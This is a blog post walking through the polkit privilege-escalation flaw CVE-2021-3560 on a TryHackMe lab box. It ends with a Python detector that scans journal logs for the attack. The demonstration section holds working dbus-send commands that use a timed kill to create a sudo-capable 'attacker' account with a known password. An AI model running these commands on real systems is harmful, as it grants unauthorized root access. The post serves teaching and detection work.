DEV Community

Cinnamon1212

Polkit CVE-2021-3560

Background

Polkit (AKA PolicyKit) is an essential component in Unix-like OSs for controlling system-wide privileges. As you can imagine, exploiting it can lead to some nasty privilege escalation. A few mainstream OSs were vulnerable to this (such as Ubuntu 20.04 and Red Hat Enterprise Linux 8), making it a very impactful vulnerability.

Understanding how and why this works

The original report can be found here.

Polkit is used to allocate privileges for users and processes. This exploit takes advantage of our ability to kill a dbus-send command before the dbus daemon is able to pass Polkit the correct ID. In turn, Polkit errors and substitutes a 0 (all privs/root).

Demonstration

I'll be using the polkit box from TryHackMe to demonstrate this.
We'll follow the tutorial process. Our first command is:

```bash
time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:attacker string:"Pentester Account" int32:1
```

It's pretty long, so let's dissect it. The command is run and timed using "time". Remember, we need the timing in order to know when to kill the dbus-send command. Our dbus-send command requests the creation of a user called attacker (and prints the reply back to us). Typically we'd see this happen in a GUI, where we'd then be prompted for a password.
That takes us to our next command:

```bash
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$TRiYeJLXw8mLuoxS$UKtnjBa837v4gk8RsQL2qrxj.0P8c9kteeTnN.B3KeeeiWVIjyH17j6sLzmcSHn5HTZLGaaUDMC4MXCjIupp8.' string:'Ask the pentester' & sleep 0.005s; kill $!
```

To finish creating our new account, we need to provide a password. SetPassword takes a sha512crypt hash as input and uses it as the password; in plain text, the password is "Expl01ted".
Finally, we use the delay we measured earlier to kill the command before the dbus-daemon is able to give Polkit our ID.
We're left with a new account called attacker, with the password Expl01ted, which is automatically added as a sudoer. We can su into this account and then sudo su to root.

How does this look in practice?

Honestly? It looks simpler than you'd expect. Other than the timing of the command, this is a low-complexity attack, since there are copy-and-paste dbus commands we can use for it. Even without those, some understanding of the dbus utilities would let you exploit this.
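Because the race has to be retried many times until the timing lands, the defender-side signal is a burst of polkitd UID-lookup failures followed by an accounts-daemon user creation. The detector below is an added example, not part of this post or of polkit; the journal lines are constructed, and the message patterns (polkitd's "Could not get UID of name" error, accounts-daemon's "create user" line) and the fixed year are assumptions to tune against your own logs.

```python
import re
from datetime import datetime, timedelta

# Constructed sample journal lines (not real captured output). The polkitd text is
# modelled on the NameHasNoOwner error raised when the requesting bus name vanishes
# mid-authorization check; treat both patterns as assumptions and adjust to your logs.
SAMPLE_JOURNAL = """\
Jun 03 10:15:01 host polkitd[812]: Error getting unix process for system-bus-name::1.140: GDBus.Error:org.freedesktop.DBus.Error.NameHasNoOwner: Could not get UID of name ':1.140': no such name
Jun 03 10:15:01 host polkitd[812]: Error getting unix process for system-bus-name::1.141: GDBus.Error:org.freedesktop.DBus.Error.NameHasNoOwner: Could not get UID of name ':1.141': no such name
Jun 03 10:15:02 host polkitd[812]: Error getting unix process for system-bus-name::1.142: GDBus.Error:org.freedesktop.DBus.Error.NameHasNoOwner: Could not get UID of name ':1.142': no such name
Jun 03 10:15:02 host accounts-daemon[915]: request by system-bus-name::1.142: create user 'attacker'
Jun 03 11:40:10 host polkitd[812]: Error getting unix process for system-bus-name::1.300: GDBus.Error:org.freedesktop.DBus.Error.NameHasNoOwner: Could not get UID of name ':1.300': no such name
"""

TS = re.compile(r"^(?P<ts>\w{3} \d\d \d\d:\d\d:\d\d) ")
UID_ERR = re.compile(r"polkitd\[\d+\]: .*Could not get UID of name '(?P<name>[^']+)'")
CREATE = re.compile(r"accounts-daemon\[\d+\]: request by .*create user '(?P<user>[^']+)'")

def parse_ts(line):
    # journalctl's default short format has no year; assume one (assumption).
    return datetime.strptime("2021 " + TS.match(line).group("ts"), "%Y %b %d %H:%M:%S")

def find_suspicious(journal, window=timedelta(seconds=5), burst=3):
    """Return findings as (kind, timestamp, detail) tuples.
    'burst': `burst` polkitd UID-lookup errors within `window` (repeated timed kills).
    'create_after_errors': a user creation preceded by such errors within `window`."""
    errors, findings = [], []
    for line in journal.splitlines():
        ts = parse_ts(line)
        recent = [t for t in errors if ts - t <= window]
        if UID_ERR.search(line):
            errors.append(ts)
            if len(recent) + 1 == burst:
                findings.append(("burst", ts, burst))
            continue
        m = CREATE.search(line)
        if m and recent:
            findings.append(("create_after_errors", ts, m.group("user")))
    return findings

if __name__ == "__main__":
    for kind, ts, detail in find_suspicious(SAMPLE_JOURNAL):
        print(f"{ts} {kind}: {detail}")
```

A single isolated UID-lookup error (the 11:40 line) is ordinary noise and is not flagged; only the burst and the creation that follows it are.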
